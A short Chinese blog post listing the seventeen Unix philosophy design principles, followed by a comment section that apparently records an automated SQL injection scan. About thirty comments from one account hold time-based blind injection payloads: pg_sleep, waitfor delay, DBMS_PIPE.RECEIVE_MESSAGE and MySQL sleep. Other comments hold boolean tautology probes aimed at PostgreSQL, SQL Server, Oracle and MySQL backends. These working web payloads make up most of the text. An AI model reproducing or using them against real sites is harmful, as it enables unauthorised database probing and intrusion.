《unix 哲学》原则整理

 • 模块原则:使用简洁的接口拼合简单的部件。
 • 清晰原则:清晰胜于技巧。
 • 组合原则:设计时考虑拼接组合。
 • 分离原则:策略同机制分离,接口同引擎分离。
 • 简洁原则:设计要简洁,复杂度能低则低。
 • 吝啬原则:除非确无他法,不要编写庞大的程序。
 • 透明性原则:设计要可见,以便审查和调试。
 • 健壮原则:健壮源于透明与简洁。
 • 表示原则:把知识叠入数据以求逻辑质朴而健壮。
 • 通俗原则:接口设计避免标新立异。
 • 缄默原则:如果一个程序没什么好说的,就沉默。
 • 补救原则:出现异常时,马上退出并给出足够错误信息。
 • 经济原则:宁花机器一分,不花程序员一秒。
 • 生成原则:避免手工hack,尽量编写程序去生成程序。
 • 优化原则:雕琢前先要有原型,跑之前先学会走。
 • 多样原则:绝不相信所谓的“不二法门”的断言。
 • 扩展原则:设计着眼未来,未来总比预想来的块。

发表于 2020.06.11


xsjyBldb • 2021-03-27 06:53

''||(select 1 from (select pg_sleep(15))x)||''

xsjyBldb • 2021-03-27 06:53

'||(select 1 from (select pg_sleep(15))x)||'

xsjyBldb • 2021-03-27 06:53

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

xsjyBldb • 2021-03-27 06:53

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

xsjyBldb • 2021-03-27 06:53

f42a32fX')) OR 187=(SELECT 187 FROM PG_SLEEP(15))--

xsjyBldb • 2021-03-27 06:53

ADT6h2JJ') OR 58=(SELECT 58 FROM PG_SLEEP(15))--

xsjyBldb • 2021-03-27 06:53

v1or6z1L' OR 740=(SELECT 740 FROM PG_SLEEP(15))--

xsjyBldb • 2021-03-27 06:53

-1)) OR 203=(SELECT 203 FROM PG_SLEEP(15))--

xsjyBldb • 2021-03-27 06:53

-5) OR 441=(SELECT 441 FROM PG_SLEEP(15))--

xsjyBldb • 2021-03-27 06:53

-5 OR 986=(SELECT 986 FROM PG_SLEEP(15))--

xsjyBldb • 2021-03-27 06:53

HEYYVhLg'; waitfor delay '0:0:15' --

xsjyBldb • 2021-03-27 06:53

1 waitfor delay '0:0:15' --

xsjyBldb • 2021-03-27 06:53

-1); waitfor delay '0:0:15' --

xsjyBldb • 2021-03-27 06:53

-1; waitfor delay '0:0:15' --

xsjyBldb • 2021-03-27 06:53

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

xsjyBldb • 2021-03-27 06:53

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

xsjyBldb • 2021-03-27 06:53

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

xsjyBldb • 2021-03-27 06:53

if(now()=sysdate(),sleep(15),0)

xsjyBldb • 2021-03-27 06:53

RLIKE (SELECT (CASE WHEN (944=944) THEN 1 ELSE 0x28 END)) --

xsjyBldb • 2021-03-27 06:53

-1 OR 3*2>(0+5+793-793)

xsjyBldb • 2021-03-27 06:53

-1 OR 3*2

xsjyBldb • 2021-03-27 06:53

-1 OR 3+793-793-1=0+0+0+1

xsjyBldb • 2021-03-27 06:53

-1 OR 2+793-793-1=0+0+0+1

xsjyBldb • 2021-03-27 06:53

1*

xsjyBldb • 2021-03-27 06:53

1*

xsjyBldb • 2021-03-27 06:53

1*

xsjyBldb • 2021-03-27 06:53

1*

xsjyBldb • 2021-03-27 06:53

bapo4ZHG